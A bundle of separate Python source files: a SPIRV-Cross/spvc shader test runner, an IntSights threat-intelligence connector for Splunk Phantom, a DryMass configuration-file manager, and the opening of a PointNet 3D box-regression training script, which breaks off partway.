action='store_true', help='Write out the failures to spvc/test/known_failures')
parser.add_argument('--run-spvc-tests', dest='run_spvc_tests',
action='store_true', help='Run tests stored in spvir-cross and spvc directory using spvc parser')
parser.add_argument('spvc', metavar='<spvc executable>')
parser.add_argument('spirv_as', metavar='<spirv-as executable>')
parser.add_argument('spirv_opt', metavar='<spirv-opt executable>')
parser.add_argument('glslang', metavar='<glslangValidator executable>')
parser.add_argument('cross_dir', metavar='<SPIRV-cross directory>')
parser.add_argument('spvc_test_dir', metavar='<spvc test directory>')
script_args = parser.parse_args()
test_env = TestEnv(script_args)
test_regex = None
if script_args.test_filter:
print('Filtering tests using \'{}\''.format(script_args.test_filter))
print('Will not check for missing failures')
test_regex = re.compile(script_args.test_filter)
# Adding tests:
# Walk SPIRV-Cross test directory and add files to tests list
# if --run_spvc_tests, also walk spvc test directory and add them to tests list
tests = []
for test_case_dir, test_function, optimize in test_case_dirs:
walk_dir = os.path.join(script_args.cross_dir, test_case_dir)
for dirpath, dirnames, filenames in os.walk(walk_dir):
dirnames.sort()
reldir = os.path.relpath(dirpath, script_args.cross_dir)
for filename in sorted(filenames):
shader = os.path.join(reldir, filename)
if not test_regex or re.search(test_regex, shader):
tests.append((test_function, test_env,
shader, filename, optimize))
if script_args.run_spvc_tests:
walk_dir = os.path.join(script_args.spvc_test_dir, test_case_dir)
for dirpath, dirnames, filenames in os.walk(walk_dir):
dirnames.sort()
reldir = os.path.relpath(dirpath, script_args.spvc_test_dir)
for filename in sorted(filenames):
shader = os.path.join(reldir, filename)
if not test_regex or re.search(test_regex, shader):
tests.append((test_function, test_env,
shader, filename, optimize))
if not script_args.jobs:
pool = Pool()
else:
pool = Pool(script_args.jobs)
# run all test without --no-validate flag
test_env.run_spvc_with_validation = True
results = pool.map(work_function, tests)
# This can occur if -f is passed in with a pattern that doesn't match to
# anything, or only matches to tests that are skipped.
if not results:
print('Did not receive any results from workers...')
return False
successes, failures = zip(*results)
# run all tests with --no-validate flag
test_env.run_spvc_with_validation = False
results = pool.map(work_function, tests)
# This can occur if -f is passed in with a pattern that doesn't match to
# anything, or only matches to tests that are skipped.
# This branch should be unreachable since the early check would have been activated
if not results:
print('Did not receive any results from workers (happened while --no-validate run)...')
return False
successes_without_validation, _ = zip(*results)
# Flattening lists of lists, and convert path markers if needed
successes = list(itertools.chain.from_iterable(successes))
successes = list(
map(lambda x: (x[0].replace(os.path.sep, '/'), x[1]), successes))
failures = list(itertools.chain.from_iterable(failures))
failures = list(
map(lambda x: (x[0].replace(os.path.sep, '/'), x[1]), failures))
successes_without_validation = list(itertools.chain.from_iterable(successes_without_validation))
successes_without_validation = list(
map(lambda x: (x[0].replace(os.path.sep, '/'), x[1]), successes_without_validation))
failures.sort()
fail_file = ""
if script_args.run_spvc_tests:
fail_file = os.path.join(os.path.dirname(
os.path.realpath(__file__)), 'known_spvc_failures')
print('Parser = spvc, Tests Directory = spirv-cross/ + spvc/ fail_file = known_spvc_failures')
else:
fail_file = os.path.join(os.path.dirname(
os.path.realpath(__file__)), 'known_failures')
print('Parser = spirv-cross, Tests Directory = spirv-cross/ + fail_file = known_failures')
print('{} test cases'.format(len(successes) + len(failures)))
print('{} passed and'.format(len(successes)))
print('{} passed with --no-validation flag'.format(len(successes_without_validation)))
if script_args.update_known_failures:
print('Updating {}'.format(fail_file))
with open(fail_file, 'w+') as f:
for failure in failures:
f. write('{},{}\n'.format(failure[0], failure[1]))
with open(fail_file, 'r') as f:
known_failures = f.read().splitlines()
known_failures = set(
map(lambda x: (x.split(',')[0], x.split(',')[1] == 'True'), known_failures))
invalid_file = os.path.join(os.path.dirname(
os.path.realpath(__file__)), 'known_invalids')
with open(invalid_file, 'r') as f:
known_invalids = f.read().splitlines()
known_invalids = set(
map(lambda x: (x.split(',')[0], x.split(',')[1] == 'True'),known_invalids))
unconfirmed_invalid_file = os.path.join(os.path.dirname(
os.path.realpath(__file__)), 'unconfirmed_invalids')
with open(unconfirmed_invalid_file, 'r') as f:
unconfirmed_invalids = f.read().splitlines()
unconfirmed_invalids = set(
map(lambda x: (x.split(',')[0], x.split(',')[1] == 'True'),unconfirmed_invalids))
unexpected_successes = []
unexpected_failures = []
unexpected_invalids = []
unexpected_valids = []
if not script_args.test_filter:
missing_failures = []
for success in successes:
if success in known_failures:
unexpected_successes.append(success)
if success in known_invalids:
unexpected_valids.append(success)
for failure in failures:
if failure not in known_failures:
if failure not in known_invalids:
unexpected_failures.append(failure)
if not script_args.test_filter:
for known_failure in known_failures:
if known_failure not in successes and known_failure not in failures:
missing_failures.append(known_failure)
for invalid in successes_without_validation:
if invalid not in successes:
if invalid not in unconfirmed_invalids and invalid not in known_invalids:
unexpected_invalids.append(invalid)
test_env.log_unexpected(unexpected_successes, 'success')
test_env.log_unexpected(unexpected_failures, 'failure')
test_env.log_unexpected(unexpected_invalids, 'invalid')
test_env.log_unexpected(unexpected_valids, 'valid')
if not script_args.test_filter:
test_env.log_missing_failures(missing_failures)
if not script_args.test_filter:
return len(unexpected_successes) != 0 or len(unexpected_failures) != 0 or len(missing_failures) != 0
else:
return len(unexpected_successes) != 0 or len(unexpected_failures) != 0
if __name__ == '__main__':
sys.exit(main())
|
<gh_stars>0
# File: intsights_connector.py
#
# Copyright (c) 2019-2022 IntSights Cyber Intelligence Ltd.
#
# This unpublished material is proprietary to IntSights.
# All rights reserved. The methods and
# techniques described herein are considered trade secrets
# and/or confidential. Reproduction or distribution, in whole
# or in part, is forbidden except by express written permission
# of IntSights.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under
# the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific language governing permissions
# and limitations under the License.
from urllib.parse import unquote
# Phantom imports
import phantom.app as phantom
import requests
from phantom.app import BaseConnector
class IntSightsConnector(BaseConnector):
"""
Represent a connector module that implements the actions that are provided by the app.
IntSightsConnector is a class that is derived from the BaseConnector class.
"""
# IntSights endpoints
INTSIGHTS_BASE_URL = 'https://api.ti.insight.rapid7.com/public/v1'
INTSIGHTS_SEARCH_IOC_URL = INTSIGHTS_BASE_URL + '/iocs/ioc-by-value'
INTSIGHTS_GET_API_VERSION_URL = INTSIGHTS_BASE_URL + '/api/version'
INTSIGHTS_GET_SOURCES_URL = INTSIGHTS_BASE_URL + '/iocs/sources'
INTSIGHTS_GET_ALERTS_LIST_URL = INTSIGHTS_BASE_URL + '/data/alerts/alerts-list'
INTSIGHTS_GET_COMPLETE_ALERT_URL = INTSIGHTS_BASE_URL + '/data/alerts/get-complete-alert/{alert_id}'
INTSIGHTS_CLOSE_ALERT_URL = INTSIGHTS_BASE_URL + '/data/alerts/close-alert/{alert_id}'
INTSIGHTS_ALERT_TAKEDOWN_URL = INTSIGHTS_BASE_URL + '/data/alerts/takedown-request/{alert_id}'
INTSIGHTS_INVESTIGATION_LINK_URL = 'https://dashboard.ti.insight.rapid7.com/#/tip/investigation/?q={ioc}'
# Supported actions
ACTION_ID_TEST_ASSET_CONNECTIVITY = 'test_asset_connectivity'
ACTION_ID_HUNT_FILE = 'hunt_file'
ACTION_ID_HUNT_DOMAIN = 'hunt_domain'
ACTION_ID_HUNT_IP = 'hunt_ip'
ACTION_ID_HUNT_URL = 'hunt_url'
ACTION_ID_ON_POLL = 'on_poll'
ACTION_ID_CLOSE_ALERT = 'close_alert'
ACTION_ID_TAKEDOWN_REQUEST = 'takedown_request'
# Messages
INTSIGHTS_CONNECTION_SUCCESSFUL = 'Test Connectivity passed'
INTSIGHTS_ERROR_NO_CONTENT = 'No data was returned from IntSights'
INTSIGHTS_ERROR_CONNECTION = 'Error getting data from IntSights. {error}'
INTSIGHTS_ERROR_AUTH = 'Authentication error'
INTSIGHTS_ERROR_INIT_SOURCES = 'Failed to initiate sources map. {error}'
INTSIGHTS_ERROR_CLOSE_ALERT = 'Failed to close alert ID {alert_id}'
INTSIGHTS_ERROR_TAKEDOWN_ALERT = 'Failed to takedown alert ID {alert_id}'
PHANTOM_ERROR_SAVE_CONTAINER = 'An error occurred while creating container for IntSights alert ID {alert_id}'
PHANTOM_ERROR_SAVE_ARTIFACT = 'An error occurred while creating artifact for IntSights alert ID {alert_id}'
INTSIGHTS_ERR_UNABLE_TO_PARSE_JSON_RESPONSE = "Unable to parse response as JSON. {error}"
INTSIGHTS_ERR_INVALID_RESPONSE = "Invalid response received from the server while fetching the list of alert ids"
# Constants relating to 'get_error_message_from_exception'
ERR_MSG_UNAVAILABLE = "Error message unavailable. Please check the asset configuration and|or action parameters."
# Constants relating to 'validate_integer'
INTSIGHTS_VALID_INT_MSG = "Please provide a valid integer value in the '{param}' parameter"
INTSIGHTS_NON_NEG_NON_ZERO_INT_MSG = "Please provide a valid non-zero positive integer value in '{param}' parameter"
INTSIGHTS_NON_NEG_INT_MSG = "Please provide a valid non-negative integer value in the '{param}' parameter"
def __init__(self):
"""Initialize global variables."""
super(IntSightsConnector, self).__init__()
self._session = None
self._sources = None
def _get_error_message_from_exception(self, e):
"""
Get appropriate error message from the exception.
:param e: Exception object
:return: error message
"""
error_code = None
error_msg = self.ERR_MSG_UNAVAILABLE
try:
if hasattr(e, "args"):
if len(e.args) > 1:
error_code = e.args[0]
error_msg = e.args[1]
elif len(e.args) == 1:
error_msg = e.args[0]
except Exception:
pass
if not error_code:
error_text = "Error Message: {}".format(error_msg)
else:
error_text = "Error Code: {}. Error Message: {}".format(error_code, error_msg)
return error_text
def _validate_integer(self, action_result, parameter, key, allow_zero=False):
"""
Validate an integer.
:param action_result: Action result or BaseConnector object
:param parameter: input parameter
:param key: input parameter message key
:allow_zero: whether zero should be considered as valid value or not
:return: status phantom.APP_ERROR/phantom.APP_SUCCESS, integer value of the parameter or None in case of failure
"""
if parameter is not None:
try:
if not float(parameter).is_integer():
return action_result.set_status(phantom.APP_ERROR, self.INTSIGHTS_VALID_INT_MSG.format(param=key)), None
parameter = int(parameter)
except Exception:
return action_result.set_status(phantom.APP_ERROR, self.INTSIGHTS_VALID_INT_MSG.format(param=key)), None
if parameter < 0:
return action_result.set_status(phantom.APP_ERROR, self.INTSIGHTS_NON_NEG_INT_MSG.format(param=key)), None
if not allow_zero and parameter == 0:
return action_result.set_status(
phantom.APP_ERROR,
self.INTSIGHTS_NON_NEG_NON_ZERO_INT_MSG.format(param=key)
), None
return phantom.APP_SUCCESS, parameter
def initialize(self):
"""Initialize the global variables with its value and validate it."""
config = self.get_config()
session = requests.Session()
session.headers.update(
{
'Accept': 'application/json',
'X-App-Name': 'Phantom_1.0',
}
)
account_id = config['account_id'].encode("utf8")
session.auth = requests.auth.HTTPBasicAuth(
account_id,
config['api_key'],
)
self._session = session
return phantom.APP_SUCCESS
def finalize(self):
"""Perform some final operations or clean up operations."""
self._session = None
return phantom.APP_SUCCESS
def _test_asset_connectivity(self):
action_result = self.add_action_result(phantom.ActionResult())
try:
response = self._session.get(self.INTSIGHTS_GET_API_VERSION_URL)
if response.status_code == 401:
return action_result.set_status(phantom.APP_ERROR, self.INTSIGHTS_ERROR_AUTH)
response.raise_for_status()
except requests.HTTPError as e:
error_msg = self._get_error_message_from_exception(e)
return action_result.set_status(phantom.APP_ERROR, self.INTSIGHTS_ERROR_CONNECTION.format(error=error_msg))
except Exception as e:
return action_result.set_status(phantom.APP_ERROR, self.INTSIGHTS_ERROR_CONNECTION.format(error=e))
self.save_progress(self.INTSIGHTS_CONNECTION_SUCCESSFUL)
return action_result.set_status(phantom.APP_SUCCESS)
def _init_sources(self, action_result):
try:
sources_map = self._session.get(self.INTSIGHTS_GET_SOURCES_URL).json()
self._sources = {
value['_id']: value['Name']
for category in sources_map.values()
for value in category
}
return phantom.APP_SUCCESS
except Exception as e:
error_msg = self._get_error_message_from_exception(e)
self.save_progress(self.INTSIGHTS_ERROR_INIT_SOURCES.format(error=error_msg))
return action_result.set_status(phantom.APP_ERROR, self.INTSIGHTS_ERROR_INIT_SOURCES.format(error=error_msg))
def _search_ioc(self, value, action_result):
self.save_progress('Searching for IOC value: ' + value)
try:
response = self._session.get(self.INTSIGHTS_SEARCH_IOC_URL, params={'iocValue': value})
if response.status_code == 204:
return action_result.set_status(phantom.APP_SUCCESS, self.INTSIGHTS_ERROR_NO_CONTENT), None
response.raise_for_status()
except requests.HTTPError as e:
error_msg = unquote(self._get_error_message_from_exception(e))
return action_result.set_status(phantom.APP_ERROR, self.INTSIGHTS_ERROR_CONNECTION.format(error=error_msg)), None
try:
ioc_data = response.json()
except Exception as e:
error_msg = self._get_error_message_from_exception(e)
return action_result.set_status(
phantom.APP_ERROR,
self.INTSIGHTS_ERR_UNABLE_TO_PARSE_JSON_RESPONSE.format(error=error_msg)
), None
ioc_data['InvestigationLink'] = self.INTSIGHTS_INVESTIGATION_LINK_URL.format(ioc=value)
source_name = ''
if self._sources:
source_name = self._sources.get(ioc_data.get('SourceID', ""))
ioc_data['SourceName'] = source_name
return phantom.APP_SUCCESS, ioc_data
def _hunt_file(self, param):
action_result = self.add_action_result(phantom.ActionResult(dict(param)))
ret_val = self._init_sources(action_result)
if phantom.is_fail(ret_val):
return action_result.get_status()
value = param['hash']
ret_val, results = self._search_ioc(value, action_result)
if phantom.is_fail(ret_val) or not results:
return action_result.get_status()
action_result.add_data(results)
return action_result.set_status(phantom.APP_SUCCESS, 'File information retrieved')
def _hunt_domain(self, param):
action_result = self.add_action_result(phantom.ActionResult(dict(param)))
ret_val = self._init_sources(action_result)
if phantom.is_fail(ret_val):
return action_result.get_status()
value = param['domain']
ret_val, results = self._search_ioc(value, action_result)
if phantom.is_fail(ret_val) or not results:
return action_result.get_status()
action_result.add_data(results)
return action_result.set_status(phantom.APP_SUCCESS, 'Domain information retrieved')
def _hunt_ip(self, param):
action_result = self.add_action_result(phantom.ActionResult(dict(param)))
ret_val = self._init_sources(action_result)
if phantom.is_fail(ret_val):
return action_result.get_status()
value = param['ip']
ret_val, results = self._search_ioc(value, action_result)
if phantom.is_fail(ret_val) or not results:
return action_result.get_status()
action_result.add_data(results)
return action_result.set_status(phantom.APP_SUCCESS, 'IP information retrieved')
def _hunt_url(self, param):
action_result = self.add_action_result(phantom.ActionResult(dict(param)))
ret_val = self._init_sources(action_result)
if phantom.is_fail(ret_val):
return action_result.get_status()
value = param['url']
ret_val, results = self._search_ioc(value, action_result)
if phantom.is_fail(ret_val) or not results:
return action_result.get_status()
action_result.add_data(results)
return action_result.set_status(phantom.APP_SUCCESS, 'URL information retrieved')
def _get_artifact(self, alert):
cef = {
'Subtype': alert.get('Details', {}).get('SubType'),
}
assets = [asset.get('Value') for asset in alert.get('Assets')]
if assets:
cef['Assets'] = assets
tags = [tag.get('Name') for tag in alert.get('Details', {}).get('Tags')]
if tags:
cef['Tags'] = tags
source_date = alert.get('Details', {}).get('Source', {}).get('Date', '')
if source_date:
cef['Source Date'] = source_date
artifact = {
'label': 'IntSights Alert',
'name': alert.get('Details', {}).get('Title'),
'description': alert.get('Details', {}).get('Description'),
'type': alert.get('Details', {}).get('Type'),
'severity': alert.get('Details', {}).get('Severity'),
'start_time': alert.get('FoundDate'),
'source_data_identifier': alert.get('_id'),
'data': alert,
'cef': cef,
}
return artifact
def _get_alert_ids(self, param, action_result):
try:
# start time is considered as last 10 days
start_time = param['end_time'] - (432000000 * 2)
params = {
'foundDateFrom': start_time,
'foundDateTo': param['end_time'],
}
response = self._session.get(self.INTSIGHTS_GET_ALERTS_LIST_URL, params=params)
if response.status_code == 204:
return action_result.set_status(phantom.APP_SUCCESS), []
response.raise_for_status()
try:
alert_ids = response.json()
if not isinstance(alert_ids, list):
self.debug_print("{}. Alert IDs: {}".format(self.INTSIGHTS_ERR_INVALID_RESPONSE, alert_ids))
return action_result.set_status(phantom.APP_ERROR, self.INTSIGHTS_ERR_INVALID_RESPONSE), []
except Exception as e:
error_msg = self._get_error_message_from_exception(e)
return action_result.set_status(
phantom.APP_ERROR,
self.INTSIGHTS_ERR_UNABLE_TO_PARSE_JSON_RESPONSE.format(error=error_msg)
), []
except Exception as e:
error_msg = self._get_error_message_from_exception(e)
return action_result.set_status(phantom.APP_ERROR, self.INTSIGHTS_ERROR_CONNECTION.format(error=error_msg)), []
return phantom.APP_SUCCESS, alert_ids
def _on_poll(self, param):
action_result = self.add_action_result(phantom.ActionResult(dict(param)))
ret_val, alert_ids = self._get_alert_ids(param, action_result)
if phantom.is_fail(ret_val):
return action_result.get_status()
max_results = param.get("container_count", len(alert_ids))
if max_results < len(alert_ids):
alert_ids = alert_ids[:max_results]
try:
for alert_id in alert_ids:
alert = self._session.get(self.INTSIGHTS_GET_COMPLETE_ALERT_URL.format(alert_id=alert_id)).json()
artifact = self._get_artifact(alert)
container = {
'name': '{title} - {id}'.format(title=alert.get('Details', {}).get('Title'), id=alert_id),
'description': 'Unresolved IntSights Alert',
'severity': alert.get('Details', {}).get('Severity'),
'source_data_identifier': alert_id,
}
status, msg, container_id_ = self.save_container(container)
if phantom.is_fail(status):
self.save_progress(self.PHANTOM_ERROR_SAVE_CONTAINER.format(alert_id=alert_id))
self.debug_print('Failed to save container', dump_object=container)
return action_result.set_status(
phantom.APP_ERROR,
self.PHANTOM_ERROR_SAVE_CONTAINER.format(alert_id=alert_id)
)
artifact['container_id'] = container_id_
status, message, _ = self.save_artifacts([artifact])
if phantom.is_fail(status):
self.save_progress(self.PHANTOM_ERROR_SAVE_ARTIFACT.format(alert_id=alert_id))
self.debug_print('Failed to save artifact', dump_object=artifact)
return action_result.set_status(
phantom.APP_ERROR,
self.PHANTOM_ERROR_SAVE_ARTIFACT.format(alert_id=alert_id)
)
return action_result.set_status(phantom.APP_SUCCESS)
except Exception as e:
error_msg = self._get_error_message_from_exception(e)
return action_result.set_status(phantom.APP_ERROR, 'Failed to get data {}'.format(error_msg))
def _get_closure_json(self, param, action_result):
closure_json = dict()
closure_json['Reason'] = param['reason']
free_text = param.get('free_text')
if free_text:
closure_json['FreeText'] = free_text
is_hidden = param.get('is_hidden')
if is_hidden:
closure_json['IsHidden'] = is_hidden
alert_rate = param.get('rate')
if alert_rate is not None:
# Integer validation for 'rate' parameter
ret_val, alert_rate = self._validate_integer(action_result, alert_rate, 'rate', True)
if phantom.is_fail(ret_val):
return action_result.get_status(), {}
closure_json['Rate'] = alert_rate
return phantom.APP_SUCCESS, closure_json
def _close_alert(self, param):
action_result = self.add_action_result(phantom.ActionResult(dict(param)))
alert_id = param['alert_id']
ret_val, closure_json = self._get_closure_json(param, action_result)
if phantom.is_fail(ret_val):
return action_result.get_status()
try:
response = self._session.patch(self.INTSIGHTS_CLOSE_ALERT_URL.format(alert_id=alert_id), json=closure_json)
if response.status_code in [400, 403, 500]:
return action_result.set_status(phantom.APP_ERROR, self.INTSIGHTS_ERROR_CLOSE_ALERT.format(alert_id=alert_id))
response.raise_for_status()
return action_result.set_status(phantom.APP_SUCCESS, "Successfully closed the alert")
except Exception as e:
error_msg = unquote(self._get_error_message_from_exception(e))
msg = "{}. {}".format(self.INTSIGHTS_ERROR_TAKEDOWN_ALERT.format(alert_id=alert_id), error_msg)
return action_result.set_status(phantom.APP_ERROR, msg)
def _takedown_request(self, param):
action_result = self.add_action_result(phantom.ActionResult(dict(param)))
alert_id = param['alert_id']
try:
response = self._session.patch(self.INTSIGHTS_ALERT_TAKEDOWN_URL.format(alert_id=alert_id))
if response.status_code in [400, 403, 500]:
return action_result.set_status(phantom.APP_ERROR, self.INTSIGHTS_ERROR_TAKEDOWN_ALERT.format(alert_id=alert_id))
response.raise_for_status()
return action_result.set_status(phantom.APP_SUCCESS, "Takedown request successfully executed")
except Exception as e:
error_msg = unquote(self._get_error_message_from_exception(e))
msg = "{}. {}".format(self.INTSIGHTS_ERROR_TAKEDOWN_ALERT.format(alert_id=alert_id), error_msg)
return action_result.set_status(phantom.APP_ERROR, msg)
def handle_action(self, param):
"""Get current action identifier and call member function of its own to handle the action."""
ret_val = phantom.APP_ERROR
action_id = self.get_action_identifier()
if action_id == self.ACTION_ID_TEST_ASSET_CONNECTIVITY:
ret_val = self._test_asset_connectivity()
elif action_id == self.ACTION_ID_HUNT_FILE:
ret_val = self._hunt_file(param)
elif action_id == self.ACTION_ID_HUNT_DOMAIN:
ret_val = self._hunt_domain(param)
elif action_id == self.ACTION_ID_HUNT_IP:
ret_val = self._hunt_ip(param)
elif action_id == self.ACTION_ID_HUNT_URL:
ret_val = self._hunt_url(param)
elif action_id == self.ACTION_ID_ON_POLL:
ret_val = self._on_poll(param)
elif action_id == self.ACTION_ID_CLOSE_ALERT:
ret_val = self._close_alert(param)
elif action_id == self.ACTION_ID_TAKEDOWN_REQUEST:
ret_val = self._takedown_request(param)
else:
raise ValueError('Action {} is not supported'.format(action_id))
return ret_val
if __name__ == '__main__':
import json
import sys
if len(sys.argv) < 2:
print('No test json specified as input')
sys.exit(1)
with open(sys.argv[1]) as f:
in_json = f.read()
in_json = json.loads(in_json)
print(json.dumps(in_json, indent=4))
connector = IntSightsConnector()
connector.print_progress_message = True
ret_val = connector._handle_action(json.dumps(in_json), None)
print(json.dumps(json.loads(ret_val), indent=4))
sys.exit(0)
|
<filename>drymass/cli/config.py
import pathlib
from . import definitions
from . import parse_funcs
from .._version import version
#: DryMass configuration file name
FILE_CONFIG = "drymass.cfg"
class ConfigFile(object):
def __init__(self, path):
"""DryMass configuration file management
Manage configuration file of an experimental data set
with restrictions imposed by
:data:`drymass.cli.definitions.config`.
Parameters
----------
path: str
path to the configuration file or a folder containing the
configuration file :data:`FILE_CONFIG`.
"""
path = pathlib.Path(path).resolve()
if path.is_dir():
path = path / FILE_CONFIG
if not path.exists():
path.touch()
self.path = path
def __getitem__(self, section):
"""Get a configuration section
Parameters
----------
section: str
the configuration section
Returns
-------
sectiondict: dict
the configuration section dictionary
"""
datadict = self._parse()
if section in datadict:
return datadict[section]
elif section in definitions.config:
# return default values
secd = {}
for kk in definitions.config[section]:
secd[kk] = definitions.config[section][kk][0]
# write result
datadict[section] = secd
self._write(datadict)
return secd
else:
raise ValueError("Unknown section title: {}".format(section))
def __setitem__(self, section, sectiondict):
"""Replace a section in the configuration file
Parameters
----------
section: str
the section name
sectiondict: dict
the configuration dictionary
Notes
-----
The previous content of the configuration section
in the configuration file is replaced.
"""
datadict = self._parse()
for key in sectiondict:
self._check_value(section, key, sectiondict[key])
datadict[section] = sectiondict
self._write(datadict)
def _check_value(self, section, key, value):
"""Check if a section/key/value pair is valid
Raises `ValueError` if this is not the case.
Returns `None`.
"""
if section not in definitions.config:
raise ValueError("Unknown section title: {}".format(section))
if key not in definitions.config[section]:
raise ValueError("Unknown key: {}: {}".format(section, key))
# For versions > 0.8.1, unknown configuration keys are `None`.
# Prior versions also used `np.nan`. Keep "nan" in the list
# below for backwards compatibility.
if value in [None, "nan", "none", "None", "()", "[]"]:
if definitions.config[section][key][0] is not None:
msg = "Unset value '{}' not allowed for [{}]: {}!".format(
value, section, key)
raise ValueError(msg)
ret_value = None
else:
type_func = definitions.config[section][key][1]
try:
type_func(value)
except BaseException as e:
msg = "Failed to parse: '[{}]: {}={}'".format(section, key,
value)
e.args = ("{}; {}".format(msg, ", ".join(e.args)),)
raise
ret_value = type_func(value)
return ret_value
def _parse_compat(self, section, key, value):
if section == "bg":
# drymass < 0.1.3: API changed in qpimage 0.1.6
if (key in ["amplitude profile", "phase profile"]
and value == "ramp"):
value = "tilt"
elif section == "roi":
# drymass <= 0.1.5: keys were renamed to reflect pixel units
if key in ["dist border", "exclude overlap", "pad border"]:
key += " px"
return key, value
def _parse(self, autocomplete=True):
"""Return configuration dictionary
Parameters
----------
autocomplete: bool
whether to fill in default configuration values when
the corresponding keys are missing in a given section.
Note that missing sections are not added. If missing
keys are found, the original configuration file is
overridden with the new data. Disabling autocompletion
also prevents writing to the configuration file.
Returns
-------
datadict: dict of dicts
configuration dictionary
Notes
-----
This function is private, because the autocomplete feature is
actually a desired behavior to keep the configuration file
human-readable. Normal users should not be able to use it,
because the concept could be considered confusing.
"""
with self.path.open() as fd:
data = fd.readlines()
outdict = {}
for line in data:
line = line.strip()
if (line.startswith("#") or
len(line) == 0):
pass
elif line.startswith("["):
sec = line.strip("[]")
outdict[sec] = {}
else:
key, val = line.split("=")
key = key.strip()
val = val.strip()
# backwards compatibility:
key, val = self._parse_compat(sec, key, val)
val = self._check_value(sec, key, val)
outdict[sec][key] = val
if autocomplete:
# Insert default variables where missing
must_write = False
for sec in outdict:
for key in definitions.config[sec]:
if key not in outdict[sec]:
outdict[sec][key] = definitions.config[sec][key][0]
must_write = True
if must_write:
# Update the configuration file
self._write(outdict)
return outdict
def _write(self, datadict):
"""Write configuration dictionary
Parameters
----------
datadict: dict of dicts
the full configuration
Notes
-----
The configuration key values are converted to the correct
dtype before writing using the definitions given in
definitions.py.
"""
keys = sorted(list(datadict.keys()))
lines = ["# DryMass version {}".format(version),
"# Configuration file documented at: ",
"# https://drymass.readthedocs.io/en/stable/"
+ "sec_gs_configuration_file.html",
]
for kk in keys:
lines.append("")
lines.append("[{}]".format(kk))
subkeys = sorted(list(datadict[kk].keys()))
for sk in subkeys:
value = datadict[kk][sk]
typefunc = definitions.config[kk][sk][1]
if value is not None:
value = typefunc(value)
if typefunc in [parse_funcs.strlist,
parse_funcs.strlist_vsort]:
# cosmetics for e.g. '[roi]: ignore data'
value = ", ".join(value)
lines.append("{} = {}".format(sk, value))
for ii in range(len(lines)):
lines[ii] += "\n"
with self.path.open("w") as fd:
fd.writelines(lines)
def remove_section(self, section):
"""Remove a section from the configuration file"""
datadict = self._parse(autocomplete=False)
datadict.pop(section)
self._write(datadict)
def set_value(self, section, key, value):
"""Set a configuration key value
Parameters
----------
section: str
the configuration section
key: str
the configuration key in `section`
value:
the configuration key value
Notes
-----
Valid section and key names are defined in definitions.py
"""
# load, update, and save
sec = self[section]
sec[key] = value
self[section] = sec
def update(self, other):
"""Update the current configuration with data from another
Parameters
----------
other: ConfigFile
the configuration file from which data is imported into
the current configuration
Notes
-----
None-valued keys are ignored.
"""
other_dict = other._parse(autocomplete=False)
for sec in other_dict:
for key in other_dict[sec]:
value = other_dict[sec][key]
if value is not None:
self.set_value(section=sec,
key=key,
value=value)
|
from __future__ import print_function
import argparse
from cProfile import label
from dis import dis
import os
import random
from socket import MSG_DONTROUTE
from sklearn import cluster
import torch
import torch.nn.parallel
import torch.optim as optim
import torch.utils.data
from pointnet.dataset import LidarDataset, BoxDataset
from pointnet.box_model import BoxNet
import torch.nn.functional as F
from tqdm import tqdm
import numpy as np
import matplotlib.pyplot as plt
import time
from model_utils import BoxNetLoss, parse_output_to_tensors, get_box3d_corners_helper, get_box3d_corners
import open3d as o3d
from provider import angle2class, size2class, class2angle, class2size, compute_box3d_iou, size2class2, give_pred_box_corners, get_3d_box
#from viz_util import draw_lidar, draw_lidar_simple
Loss = BoxNetLoss()
NUM_HEADING_BIN = 12
NUM_SIZE_CLUSTER = 3 # one cluster for each type
NUM_OBJECT_POINT = 512
def boxes_to_corners_3d(boxes3d):
"""
7 -------- 4
/| /|
6 -------- 5 .
| | | |
. 3 -------- 0
|/ |/
2 -------- 1
Args:
boxes3d: (N, 7) [x, y, z, dx, dy, dz, heading], (x, y, z) is the box center
Returns:
corners3d: (N, 8, 3)
"""
template = np.array([
[1, 1, -1], [1, -1, -1], [-1, -1, -1], [-1, 1, -1],
[1, 1, 1], [1, -1, 1], [-1, -1, 1], [-1, 1, 1],
]) / 2
corners3d = boxes3d[:, None, 3:6] * template[None, :, :]
corners3d = rotate_points_along_z(corners3d, boxes3d[:, 6]).reshape(-1, 8, 3)
corners3d += boxes3d[:, None, 0:3]
return corners3d
def rotate_points_along_z(points, angle):
"""
Args:
points: (B, N, 3)
angle: (B), angle along z-axis, angle increases x ==> y
Returns:
"""
cosa = np.cos(angle)
sina = np.sin(angle)
ones = np.ones_like(angle, dtype=np.float32)
zeros = np.zeros_like(angle, dtype=np.float32)
rot_matrix = np.stack((
cosa, sina, zeros,
-sina, cosa, zeros,
zeros, zeros, ones
), axis=1).reshape(-1, 3, 3)
points_rot = np.matmul(points, rot_matrix)
return points_rot
parser = argparse.ArgumentParser()
parser.add_argument('--batchSize', type=int, default=32, help='input batch size')
parser.add_argument('--num_points', type=int, default=128, help='input size')
parser.add_argument('--workers', type=int, help='number of data loading workers', default=4)
parser.add_argument('--nepoch', type=int, default=250, help='number of epochs to train for')
parser.add_argument('--outf', type=str, default='cls', help='output folder')
parser.add_argument('--model', type=str, default='', help='model path')
parser.add_argument('--dataset', type=str, required=False, help="dataset path")
parser.add_argument('--dataset_type', type=str, default='bbox', help="dataset type bbox|lidar")
opt = parser.parse_args()
print(opt)
blue = lambda x: '\033[94m' + x + '\033[0m'
opt.manualSeed = random.randint(1, 10000) # fix seed
print("Random Seed: ", opt.manualSeed)
random.seed(opt.manualSeed)
torch.manual_seed(opt.manualSeed)
if opt.dataset_type == 'bbox':
box_dataset = BoxDataset(
#root=opt.dataset,
root='train_unbbox_dataset',
classification=True,
npoints=opt.num_points,
data_augmentation=False)
test_box_dataset = BoxDataset(
#root=opt.dataset,
root='test_unbbox_dataset',
classification=True,
split='test',
npoints=opt.num_points,
data_augmentation=False)
else:
exit('wrong dataset type')
box_dataloader = torch.utils.data.DataLoader(
box_dataset,
batch_size=opt.batchSize,
shuffle=True,
num_workers=int(opt.workers))
testboxdataloader = torch.utils.data.DataLoader(
test_box_dataset,
batch_size=opt.batchSize,
shuffle=True,
num_workers=int(opt.workers))
print(len(box_dataset), len(test_box_dataset))
num_classes = len(box_dataset.classes)
print('classes', num_classes)
try:
os.makedirs(opt.outf)
except OSError:
